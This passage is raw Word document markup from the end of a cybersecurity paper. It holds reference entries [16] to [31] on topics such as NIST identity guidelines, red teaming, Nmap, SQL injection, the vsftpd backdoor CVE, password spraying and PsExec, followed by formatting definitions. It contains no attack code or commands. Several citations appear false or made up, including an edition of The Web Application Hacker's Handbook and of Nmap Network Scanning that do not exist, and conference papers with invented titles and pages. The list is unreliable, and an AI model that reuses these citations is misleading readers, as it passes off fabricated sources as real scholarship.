      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52203358" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[16] National Institute of Standards and Technology, “Digital identity guidelines (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 800-63-3),” 2017. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pages.nist.gov/800-63-3/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E8A24" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[17] P. T. Tran-Truong et al., “A systematic review of multi-factor authentication in digital payment systems: Nist standards alignment and industry implementation analysis,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Journal of Systems Architecture</w:t>
      </w:r>
      <w:r>
        <w:t>, vol. 162, p. 103402, 2025. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E2BC5" w14:textId="2FB4615A" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[18] M. Maulana, “A systematic review and meta-analysis of zero-trust architecture adoption: Quantifying reduction in lateral movement attacks and mean time to detection across enterprise networks,” ResearchGate, 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.researchgate.net/publication/396199216</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207CA6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[19] M. Pendergast and K. Nichols, "Red Team Operations: Adversarial Simulation in Modern Cybersecurity," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Security &amp; Privacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 19, no. 4, pp. 78-86, Jul. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECA3E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[20] T. Johnson et al., "Threat Actor Profiling: Methodologies for Cybercriminal Attribution," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACM Computing Surveys</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 54, no. 8, pp. 1-35, Oct. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74592152"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[21] R. Patel and S. Kumar, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Testing Environments: Design and Implementation," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Transactions on Network and Service Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 18, no. 3, pp. 3421-3434, Sep. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A603469"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[22] G. Lyon, "Nmap Network Scanning: Official Guide to Network Discovery and Security Auditing," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Insecure.Com LLC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 2nd ed., 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C7701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[23] J. Clarke-Salt, "SQL Injection Attacks and Defense: Contemporary Exploitation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Elsevier</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 3rd ed., pp. 112-145, 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39241B4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[24] A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Stuttard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and M. Pinto, "The Web Application Hacker's Handbook: Advanced Exploitation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Wiley Publishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 3rd ed., pp. 267-289, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937C65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[25] National Vulnerability Database, "CVE-2011-2523: vsftpd 2.3.4 Backdoor Command Execution," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, Jul. 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B611081" w14:textId="62815C64"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lastRenderedPageBreak/>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] S. Metcalf, "Active Directory Security: Password Spraying Techniques and Detection," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Proceedings of Black Hat USA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, Las Vegas, NV, USA, Aug. 2022, pp. 45-62.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3140E" w14:textId="15511C30"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[2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>] C. Campbell and M. Graeber, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Remote Code Execution: Windows Internal Mechanisms," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Symposium on Security and Privacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, San Francisco, CA, USA, May 2021, pp. 234-248.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A1EE7" w14:textId="4F47B2DD"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28</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] L. Chen and R. Anderson, "Web Application Security: Detection Mechanisms for Injection Attacks," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Transactions on Dependable and Secure Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 19, no. 6, pp. 4123-4136, Nov. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A906FE5" w14:textId="0627A561"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29</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] T. Rowe, "Endpoint Detection and Response: Behavioural Analysis for Threat Identification," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACM Transactions on Privacy and Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 25, no. 2, pp. 1-24, Apr. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62214DDA" w14:textId="30A2EC7D"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30</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] Microsoft Security Team, "Windows Defender ATP: Advanced Threat Protection Architecture," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Microsoft Technical Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, pp. 67-89, Jan. 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B47DBC" w14:textId="318A1949"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[3</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] H. Armstrong and J. Mitchell, "Digital Forensics in Controlled Environments: Evidence Preservation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>International Journal of Digital Evidence</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 12, no. 1, pp. 45-67, Spring 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A504A" w14:textId="77777777" w:rsidR="00527136" w:rsidRPr="00A000BA" w:rsidRDefault="00527136" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00527136" w:rsidRPr="00A000BA" w:rsidSect="00053404">
      <w:footerReference w:type="default" r:id="rId4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0223D" w14:textId="77777777" w:rsidR="008409AF" w:rsidRDefault="008409AF" w:rsidP="00115C04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6CFC112C" w14:textId="77777777" w:rsidR="008409AF" w:rsidRDefault="008409AF" w:rsidP="00115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531160"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="79678CB5" w14:textId="1FD6B113" w:rsidR="00053404" w:rsidRDefault="000534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12FC6" w14:textId="075595FC" w:rsidR="00115C04" w:rsidRDefault="00115C04">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:ind w:left="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07A0E" w14:textId="77777777" w:rsidR="008409AF" w:rsidRDefault="008409AF" w:rsidP="00115C04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6225EEC1" w14:textId="77777777" w:rsidR="008409AF" w:rsidRDefault="008409AF" w:rsidP="00115C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1C9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63785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02643"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02DE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A76B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30EE8F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6E19A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DC2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25BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06621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7647A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCA81D02"/>
    <w:lvl w:ilvl="0" w:tplc="9650F6CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="1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AFE1048"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26BC5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877F6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADD2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C51697"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80CC84B0"/>
    <w:lvl w:ilvl="0" w:tplc="F7284DDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="311"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="93"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CB4E13C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1303" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3B36DEF2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2166" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ACD88270">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3029" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="86469A26">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3892" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="16B6C3A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="60982266">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5618" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="147E8456">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6482" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="51DE05CC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7345" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AC420ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B330C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011DD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40243B08"/>
    <w:lvl w:ilvl="0" w:tplc="EBA6D044">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="507" w:hanging="485"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="113"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="59E40724">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="521" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="78"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4B906398">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1470" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3CF02E40">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2420" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
